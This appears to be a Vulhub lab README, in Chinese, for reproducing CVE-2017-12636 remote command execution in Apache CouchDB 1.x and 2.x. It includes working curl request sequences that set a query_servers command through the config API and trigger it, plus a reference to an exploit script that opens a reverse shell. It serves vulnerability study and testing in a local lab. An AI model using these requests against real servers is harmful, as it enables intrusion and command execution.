# Couchdb 任意命令执行漏洞（CVE-2017-12636）

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置`query_server`，这个配置项在设计、执行view的时候将被运行。

影响版本：小于 1.7.0 以及 小于 2.1.1

参考链接：

 - http://bobao.360.cn/learning/detail/4716.html
 - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html

## 测试环境

Couchdb 2.x和和1.x的API接口有一定区别，所以这个漏洞的利用方式也不同。本环境启动的是1.6.0版本，如果你想测试2.1.0版本，可以启动[CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635)附带的环境。

执行如下命令启动Couchdb 1.6.0环境：

```
docker compose up -d
```

启动完成后，访问`http://your-ip:5984/`即可看到Couchdb的欢迎页面。

## 漏洞复现

该漏洞是需要登录用户方可触发，如果不知道目标管理员密码，可以利用[CVE-2017-12635](https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635)先增加一个管理员用户。

### 1.6.0 下的说明

依次执行如下请求即可触发任意命令执行：

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'
```

其中,`vulhub:vulhub`为管理员账号密码。

第一个请求是添加一个名字为`cmd`的`query_servers`，其值为`"id >/tmp/success"`，这就是我们后面待执行的命令。

第二、三个请求是添加一个Database和Document，这里添加了后面才能查询。

第四个请求就是在这个Database里进行查询，因为我将language设置为`cmd`，这里就会用到我第一步里添加的名为`cmd`的`query_servers`，最后触发命令执行。

### 2.1.0 下的说明

2.1.0中修改了我上面用到的两个API，这里需要详细说明一下。

Couchdb 2.x 引入了集群，所以修改配置的API需要增加node name。这个其实也简单，我们带上账号密码访问`/_membership`即可：

```
curl http://vulhub:vulhub@your-ip:5984/_membership
```

![](1.png)

可见，我们这里只有一个node，名字是`nonode@nohost`。

然后，我们修改`nonode@nohost`的配置：

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/_node/nonode@nohost/_config/query_servers/cmd -d '"id >/tmp/success"'
```

![](2.png)

然后，与1.6.0的利用方式相同，我们先增加一个Database和一个Document：

```
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
```

Couchdb 2.x删除了`_temp_view`，所以我们为了触发`query_servers`中定义的命令，需要添加一个`_view`：

```
curl -X PUT http://vulhub:vulhub@your-ip:5984/vultest/_design/vul -d '{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
```

增加`_view`的同时即触发了`query_servers`中的命令。

## 利用脚本

写了一个简单的脚本 [exp.py](exp.py)，修改其中的target和command为你的测试机器，然后修改version为对应的Couchdb版本（1或2），成功反弹shell：

![](3.png)
